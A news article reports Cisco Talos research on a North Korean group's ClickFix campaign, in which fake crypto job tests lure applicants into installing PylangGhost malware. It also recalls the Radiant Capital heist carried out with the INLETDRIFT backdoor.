North Korea targeting Indian crypto job applicants with malware

Job applicants in the cryptocurrency and blockchain industry are being targeted by North Korean hackers seeking to infect the devices of potential new hires and steal their data. 

Researchers at Cisco Talos said they found a North Korean group dubbed “Famous Chollima” running a campaign since mid-2024 targeting a small number of people primarily based in India. 

The group is creating fake employers and getting real software engineers, marketing employees, designers and others to visit skill-testing pages in order to move forward with their applications. 

“Based on the advertised positions, it is clear that the Famous Chollima is broadly targeting individuals with previous experience in cryptocurrency and blockchain technologies,” Cisco Talos explained in a blog on Wednesday. 

“The skill-testing sites attempt to impersonate real companies such as Coinbase, Archblock, Robinhood, Parallel Studios, Uniswap and others, which helps with the targeting.”

Victims are sent an invite code to a testing website where they are expected to enter their details and answer questions about their skills. Applicants are then asked to record a video for interviewers. 

When the person approves camera access to the site, it displays instructions asking the applicant to copy and paste code onto their computer — purportedly to install something for the video. 

Cisco Talos called the malware “PylangGhost,” and said it was used exclusively by Famous Chollima. The tactic used in the campaign, known as “ClickFix,” involves hackers trying to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting and launching commands that eventually result in the download of malware.

The hackers created versions of the malware for MacOS and Windows that allow them to steal stored browser credentials, session cookies and other data from various browser extensions. 

Famous Chollima and other groups have been heavily involved in Pyongyang’s efforts to get North Koreans hired at American and European tech firms. The government earns money from their citizens’ salaries and from cryptocurrency thefts enabled by their infiltration of blockchain firms. U.S. law enforcement believes North Korea’s military brings in billions of dollars through the schemes.

The campaign observed by Cisco Talos reflects other efforts by North Korea to infect job seekers with malware in an effort to get information on the attributes of successful applicants in the crypto space — potentially useful data for North Korea in order to get their citizens hired. 

There is also evidence of North Korean hackers infecting applicant devices that can be then accessed at a later date when the person is hired at a legitimate cryptocurrency company. In December, the crypto platform Radiant Capital said a $50 million heist by North Korean hackers began when a PDF laced with malware was sent to its engineers. 

The threat actor pretended to be a former contractor for the company, asking officials to read through a report on another recent cybersecurity incident affecting a different cryptocurrency company. The Radiant Capital developers were sent a link to a ZIP file with a PDF inside that contained a sophisticated piece of malware called INLETDRIFT, a backdoor used to infect macOS devices. 

Since 2023, experts have warned that cryptocurrency industry officials with Macbooks were  prime targets for North Korea.